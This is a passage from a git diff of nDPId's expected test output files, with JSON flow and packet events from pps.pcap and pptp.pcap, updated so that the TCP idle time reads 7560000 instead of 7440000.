+00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":96,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353195855,"flow_last_seen":1467353195998,"flow_idle_time":7560000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50772,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196348,"flow_last_seen":1467353199417,"flow_idle_time":7560000,"flow_min_l4_payload_len":221,"flow_max_l4_payload_len":345,"flow_tot_l4_payload_len":566,"flow_avg_l4_payload_len":283,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"123.125.111.70","src_port":50775,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00583{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1467353136483,"flow_last_seen":1467353136483,"flow_idle_time":180000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":45,"flow_tot_l4_payload_len":131,"flow_avg_l4_payload_len":43,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"183.228.182.44","dst_ip":"192.168.115.8","src_port":13913,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":84,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1467353189820,"flow_last_seen":1467353201861,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":665,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.41","dst_ip":"239.255.255.250","src_port":50374,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} @@ -545,12 +545,12 @@ 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.20","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136837,"flow_last_seen":1467353136837,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"210.47.12.19","src_port":22793,"dst_port":33738,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7440000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} -00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7440000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7440000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} -00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7440000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00677{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":92,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353191538,"flow_last_seen":1467353191606,"flow_idle_time":7560000,"flow_min_l4_payload_len":145,"flow_max_l4_payload_len":210,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":177,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.110.220.15","src_port":50765,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00658{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00584{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1467353144633,"flow_last_seen":1467353144633,"flow_idle_time":7560000,"flow_min_l4_payload_len":293,"flow_max_l4_payload_len":293,"flow_tot_l4_payload_len":293,"flow_avg_l4_payload_len":293,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"117.79.81.135","dst_ip":"192.168.115.8","src_port":80,"dst_port":50443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00686{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":100,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196441,"flow_last_seen":1467353196535,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":340,"flow_tot_l4_payload_len":480,"flow_avg_l4_payload_len":240,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50776,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00688{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":101,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353196740,"flow_last_seen":1467353196835,"flow_idle_time":7560000,"flow_min_l4_payload_len":140,"flow_max_l4_payload_len":1132,"flow_tot_l4_payload_len":1272,"flow_avg_l4_payload_len":636,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50777,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":104,"flow_state":"finished","flow_packets_processed":3,"flow_first_seen":1467353197951,"flow_last_seen":1467353198052,"flow_idle_time":7560000,"flow_min_l4_payload_len":70,"flow_max_l4_payload_len":1260,"flow_tot_l4_payload_len":1470,"flow_avg_l4_payload_len":490,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.206.22.77","src_port":50779,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.PPStream","breed":"Fun","category":"Streaming"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":75,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1467353179045,"flow_last_seen":1467353203065,"flow_idle_time":180000,"flow_min_l4_payload_len":133,"flow_max_l4_payload_len":133,"flow_tot_l4_payload_len":1197,"flow_avg_l4_payload_len":133,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":58897,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00682{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":70,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":1467353166729,"flow_last_seen":1467353166729,"flow_idle_time":180000,"flow_min_l4_payload_len":123,"flow_max_l4_payload_len":123,"flow_tot_l4_payload_len":123,"flow_avg_l4_payload_len":123,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.63","dst_ip":"239.255.255.250","src_port":60976,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00598{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136834,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"111.117.101.81","src_port":22793,"dst_port":10162,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} @@ -559,7 +559,7 @@ 00638{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":400,"flow_first_seen":1467353136432,"flow_last_seen":1467353136981,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":148446,"flow_avg_l4_payload_len":371,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"1.173.5.226","dst_ip":"192.168.115.8","src_port":22636,"dst_port":22793,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00600{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00585{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":5,"flow_first_seen":1467353136439,"flow_last_seen":1467353136660,"flow_idle_time":180000,"flow_min_l4_payload_len":37,"flow_max_l4_payload_len":1067,"flow_tot_l4_payload_len":3271,"flow_avg_l4_payload_len":654,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"202.198.7.89","src_port":22793,"dst_port":16039,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} -00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7440000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} +00678{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":73,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":1467353172446,"flow_last_seen":1467353172450,"flow_idle_time":7560000,"flow_min_l4_payload_len":235,"flow_max_l4_payload_len":785,"flow_tot_l4_payload_len":1020,"flow_avg_l4_payload_len":510,"midstream":1,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"23.41.133.163","src_port":50500,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"}} 00683{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":83,"flow_state":"finished","flow_packets_processed":18,"flow_first_seen":1467353189784,"flow_last_seen":1467353196145,"flow_idle_time":180000,"flow_min_l4_payload_len":431,"flow_max_l4_payload_len":511,"flow_tot_l4_payload_len":8571,"flow_avg_l4_payload_len":476,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.5.38","dst_ip":"239.255.255.250","src_port":1900,"dst_port":1900,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"SSDP","breed":"Acceptable","category":"System"}} 00596{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","ndpi": {"proto":"Unknown","breed":"Unrated"}} 00581{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":2557,"source":"pps.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1467353136833,"flow_last_seen":1467353136834,"flow_idle_time":180000,"flow_min_l4_payload_len":24,"flow_max_l4_payload_len":24,"flow_tot_l4_payload_len":48,"flow_avg_l4_payload_len":24,"midstream":0,"thread_ts_msec":1467353203157,"l3_proto":"ip4","src_ip":"192.168.115.8","dst_ip":"36.237.154.69","src_port":22793,"dst_port":4316,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} diff --git a/test/results/pptp.pcap.out b/test/results/pptp.pcap.out index 3f5b721f2..ebe581745 100644 --- a/test/results/pptp.pcap.out +++ b/test/results/pptp.pcap.out @@ -1,11 +1,11 @@ 00455{"daemon_event_id":1,"daemon_event_name":"init","thread_id":0,"packet_id":0,"source":"pptp.pcap","alias":"nDPId-test","max-flows-per-thread":2048,"max-idle-flows-per-thread":64,"tick-resolution":1000,"reader-thread-count":1,"flow-scan-interval":10000,"generic-max-idle-time":600000,"icmp-max-idle-time":120000,"udp-max-idle-time":180000,"tcp-max-idle-time":7560000,"max-packets-per-flow-to-send":3,"max-packets-per-flow-to-process":32,"global_ts_msec":0} 00541{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","packets-captured":1,"packets-processed":0,"total-skipped-flows":0,"total-l4-data-len":0,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":0,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":0,"total-idle-flows":0,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":2,"global_ts_msec":1451895531141} -00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1451895531141,"flow_last_seen":1451895531141,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1451895531141,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} -00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} -00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} -00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} -00673{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":24,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":24,"flow_first_seen":1451895531141,"flow_last_seen":1451895536574,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":168,"flow_tot_l4_payload_len":740,"flow_avg_l4_payload_len":30,"midstream":0,"thread_ts_msec":1451895536574,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} +00573{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1451895531141,"flow_last_seen":1451895531141,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1451895531141,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00475{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1451895531141,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531141,"pkt":"AhoR+E9+0N+aZRdHCABFAAA8SqVAAEAGB\/LAqCsWv2U9AaGWBrt+ULaEAAAAAKACchAUeAAAAgQFtAQCCAoAB\/whAAAAAAEDAwo="} +00474{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1451895531183,"pkt":"0N+aZRdHAhoR+E9+CABFUAA8Q2pAAPwGUty\/ZT0BwKgrFga7oZZ1tjA4flC2haASD5Yd2AAAAgQFMgEBCAoLt6rxAAf8IQQCAAA="} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1451895531183,"pkt":"AhoR+E9+0N+aZRdHCABFAAA0SqZAAEAGB\/nAqCsWv2U9AaGWBrt+ULaFdbYwOYAQchDmkwAAAQEICgAH\/CwLt6rx"} +00633{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":4,"source":"pptp.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1451895531141,"flow_last_seen":1451895531183,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":156,"flow_tot_l4_payload_len":156,"flow_avg_l4_payload_len":39,"midstream":0,"thread_ts_msec":1451895531183,"l3_proto":"ip4","src_ip":"192.168.43.22","dst_ip":"191.101.61.1","src_port":41366,"dst_port":1723,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"PPTP","breed":"Acceptable","category":"VPN"}} 